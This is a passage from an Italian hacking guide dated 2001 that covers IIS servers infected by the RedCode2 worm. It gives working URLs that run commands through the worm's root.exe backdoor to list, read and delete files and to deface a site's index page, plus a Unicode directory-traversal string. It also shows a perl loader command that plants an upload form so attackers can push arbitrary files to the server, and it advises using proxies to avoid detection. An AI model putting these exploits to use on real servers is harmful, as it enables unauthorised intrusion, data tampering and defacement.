Agosto-2001

            
                            .:La Grande Guida AllHacking Di IIS:.            
                                                                                
                                       [realizzata da]                          
                       ___                                                      
                      /     __   __  |/  |__   __   __  |/   ___   __           
                      \___ (__) (__) |\ |__) (__) (__) |\ (__/_ |  '          
                                                                                
                                                                                
                                            ___                                 
                                           (__/_                                
                                                                                
                     _                                                          
                    |_  ___  |   _|_   __   __    __  __   __   __              
                    |  (__/_ |_,  |_, (__) |  ) __)  |__) |  ' (__( (__|        
                                                     |                _|        
            


2.3 RedCode2

[Sistemi vulnerabili: Windows NT 4/5 con IIS 4/5]

[Exploit: RedCodeLoader (www.umcrew.com)]

[Vulnerabilit]

Il worm noto come RedCode2, che sfrutta come il precedente una vulnerabilit di IIS 4 e 5 per diffondersi, svolge nella macchina infetta le seguenti azioni:

1) crea una copia di se col nome "explorer.exe" in C e D;
2) condivide via web le unit C e D;
3) copia "cmd.exe" col nome di "root.exe" nelle directory "msadc" e "scripts";
4) segue una ricerca di altri server vulnerabili da infettare.

A noi interessa il terzo punto.
L'unicode bug ci permetteva di risalire le directory del server fino ad arrivare al file "cmd.exe" contenuto nella cartella System32 consentendoci cos di eseguire qualunque comando dos in remoto. In un computer infetto dal RedCode2 non servono strambi codici (tipo "/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c") per accedere a "cmd.exe" dato che  stato copiato col nome "root.exe" nella cartella "scripts" o nella cartella "msadc". Per eseguire dei comandi dos in remoto baster quindi visitare da browser (mi raccomando: usate qualche proxy!) il seguente url:

http://www.vittima.com/scripts/root.exe?/c

o

http://www.vittima.com/msadc/root.exe?/c

L'utilizzo di questo exploit  lo stesso dell'unicode.

Esempi:

http://www.vittima.com/scripts/root.exe?/c dir c:\ [ vi verr mostrato il contenuto di C ]

http://www.vittima.com//scripts/root.exe?/c echo Hacked+by+COOKBOOKER> c:\inetpub\dir_sito\index.htm [ creer un file index.htm con scritto "Hacked by COOKBOOKER" nella cartella "c:\inetpub\dir_sito" ]

http://www.vittima.com//scripts/root.exe?/c del c:\wbill.txt [ questo comando cancella un ipotetico file "wbill.txt" (MOLTO ipotetico... chi scriver mai "Viva Bill"? ;o))]

http://www.vittima.com//scripts/root.exe?/c type c:\wbill.txt [ il comando "type" ci permette di leggere il contenuto del solito ipotetico file "wbill.txt" ]

[Exploit]

Un adattamento fatto da me dell'unicodeloader per il RedCode2  reperibile in http://umcrew.supereva.it ;o) 
Il RedCodeLoader vi permetter di uploadare file in un server infetto.

Esempio:

perl redcodeloader.pl www.server.com:80 'c:\inetpub\wwwroot\'

Questo comando uploader un file upload.asp e upload.inc nella cartella c:\inetpub\wwwroot\ (che di default contiene il sito). Ora ci baster visitare www.server.com/upload.asp per avere a disposizione un form che ci permetter di uploadare qualunque file nel server. :o)

[ Patch: http://www.microsoft.com/technet/security/bulletin/MS01-033.asp ]
                           _________________________________________
                          [                                         ]
                          [            Copyright (C) 2001           ]
                          [                                         ]
                          [ FeltonSpray  - feltonspray@katamail.com ]
                          [                                         ]
                          [   Cookbooker - cookbooker@libero.it     ]
                          [                                         ]
                           